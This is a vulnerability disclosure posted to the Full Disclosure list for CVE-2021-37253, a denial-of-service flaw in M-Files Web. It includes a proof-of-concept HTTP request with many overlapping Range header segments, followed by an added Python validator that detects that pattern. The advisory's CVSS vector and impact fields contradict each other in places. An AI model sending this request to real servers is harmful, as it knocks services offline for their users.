Message-ID: <CADmavP15=upXEjuPK6Cx6ncE4tJZH56ef6TzRMmTaXo5zqu9TA@mail.gmail.com>
Date: Wed, 1 Dec 2021 17:08:38 +0300
From: Murat Aydemir <murataydemir94@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] CVE-2021-37253: M-Files Web Improper Range Header Processing Denial of Services (DoS) Vulnerability

I. SUMMARY
=============================================================================
Title: M-Files Web Improper Range Header Processing Denial of Service (DoS) Vulnerability
Product: M-Files Web version before 20.10.9524.1, M-Files Web version before 20.10.9445.0
Vulnerability Type(s): Denial of Service (DoS)
Credit by/Researcher: Murat Aydemir (Turkey)
Contact: https://twitter.com/mrtydmr75
Github: https://github.com/murataydemir
=============================================================================

II. CVE REFERENCE, CVSS SCORES & VULNERABILITY TYPES
=============================================================================
CVE Number: CVE-2021-37253
CVSSv3 Score: 4.3
CVSSv3 Vector: CVSS:4.3 (AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L)
Severity: Medium
Confidentiality Impact: None (There is no impact to the confidentiality of the system)
Integrity Impact: None (There is no impact to the integrity of the system)
Availability Impact: Complete (There is a total shutdown of the affected resource. The attacker can render the resource completely unavailable)
Access Complexity: Low (Specialized access conditions or extenuating circumstances do not exist. Very little knowledge or skill is required to exploit)
Authentication: Not required (Authentication is not required to exploit the vulnerability)
Gained Access: None
Vulnerability Type(s): Denial of Service (DoS)
CWE ID: CWE-399 Resource Management Errors (https://cwe.mitre.org/data/definitions/399.html)
=============================================================================

III. TIMELINE
=============================================================================
Contact to Vendor: the 24th of August, 2020
Vendor (M-Files) Reply: the 3rd of November, 2020 (rejected vulnerability)
Contact to Vendor: the 4th of November, 2020 (provided additional information and some proofs of concept)
Vendor (M-Files) Reply: the 6th of November, 2020 (accepted vulnerability and asked for time to fix)
Vendor (M-Files) Reply: the 4th of August, 2021 (informed me that "we're accepting this vulnerability but we'll not give an effort to fix that and also will not apply any CVE for this vuln.")
Contact to MITRE: the 4th of August, 2021 (contacted MITRE and applied for a CVE. MITRE has reserved a CVE for this vulnerability)
=============================================================================

IV. DESCRIPTION & MITIGATION
=============================================================================
M-Files Web version before 20.10.9524.1 and M-Files Web version before 20.10.9445.0 contain an Improper Range Header Processing Vulnerability.

A remote unauthenticated attacker may send crafted requests with overlapping ranges (via HTTP requests with a specially crafted Range or Request-Range header) to cause the web application to compress each of the requested bytes, resulting in a crash due to excessive memory and CPU consumption and preventing users from accessing the system.

Even though this vulnerability (CVE-2021-37253) has been verified and accepted by the Vendor (M-Files), their security team also contacted me and informed me that no effort will be given to fixing it. Thus, there is no active patch, update or mitigation plan for the CVE-2021-37253 vulnerability.

The following measures do not fully fix the problem (they are remediations rather than a fix), but I strongly recommend that you restrict the IP addresses from which the web application accepts incoming requests/clients, or reconfigure the web server's "Byte-range Request Segment Size", as soon as possible.
=============================================================================

V. PROOF OF CONCEPT (POC) FOR CVE-2021-37253
=============================================================================
This vulnerability is easy to detect and exploit. Just find a static asset (such as .png, .jpg, .jpeg, .js, .css and so on) and make a request as follows.

GET /Icons/Standard/Listing/VaultMounting.png HTTP/1.1
Host: <host>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Range: bytes=0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-

Note: this issue is valid and easily reproducible for all static assets (those with .png, .jpg, .jpeg, .js, .css, .gif extensions and so on).
=============================================================================

VI. REFERENCE(S)
=============================================================================
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37253
https://nvd.nist.gov/vuln/detail/CVE-2021-37253
=============================================================================

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
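The remediation in section IV (limiting byte-range segments) can be enforced in front of the application, and the same logic doubles as a detection for the section V request shape. The following is an added example written for this page, not M-Files code or the author's: a Range-header validator that parses byte-range specs, drops unsatisfiable ones, and rejects sets that are too numerous, overlapping/descending, or that amplify the served bytes beyond the resource size. The thresholds MAX_RANGES and MAX_AMPLIFICATION are assumed policy values, not figures from the advisory.

```python
import re

# Assumed policy knobs (not from the advisory): cap the number of byte-range
# specs per request and the ratio of served bytes to resource size.
MAX_RANGES = 5
MAX_AMPLIFICATION = 2.0

_SPEC = re.compile(r"^(\d*)-(\d*)$")   # "first-last", "first-" or "-suffix"

def parse_byte_ranges(header, resource_len):
    """Parse a Range header into absolute (start, end) pairs, end inclusive.
    Returns None when the header is not a syntactically valid bytes range set;
    specs that cannot be satisfied for this resource length are dropped."""
    if not header.lower().startswith("bytes="):
        return None
    ranges = []
    for spec in header[6:].split(","):
        m = _SPEC.match(spec.strip())
        if not m or (m.group(1) == "" and m.group(2) == ""):
            return None
        first, last = m.group(1), m.group(2)
        if first == "":                        # suffix range: the last N bytes
            n = min(int(last), resource_len)
            start, end = resource_len - n, resource_len - 1
        else:
            start = int(first)
            end = resource_len - 1 if last == "" else min(int(last), resource_len - 1)
        if start <= end:
            ranges.append((start, end))
    return ranges

def check_range_header(header, resource_len):
    """Return (allowed, reason, served_bytes) for a Range header value."""
    ranges = parse_byte_ranges(header, resource_len)
    if ranges is None:
        return False, "malformed", 0
    if not ranges:
        return False, "unsatisfiable", 0
    if len(ranges) > MAX_RANGES:
        return False, f"too many ranges ({len(ranges)})", 0
    served = sum(end - start + 1 for start, end in ranges)
    for (_, e1), (s2, _) in zip(ranges, ranges[1:]):
        if s2 <= e1:                           # overlap or out-of-order segment
            return False, "overlapping or descending ranges", served
    if served > MAX_AMPLIFICATION * resource_len:
        return False, "amplification", served
    return True, "ok", served

# Constructed samples: a header shaped like the advisory's PoC, and a benign resume.
POC = "bytes=" + ",".join(["0-"] * 27)
BENIGN = "bytes=500-999,1500-"
if __name__ == "__main__":
    for h in (POC, BENIGN):
        print(h[:40], check_range_header(h, 10_000))
```

Run in front of static-asset handlers (or over access logs that record the Range header), any "too many ranges" or "overlapping" verdict on a .png/.js/.css request is the pattern this advisory describes.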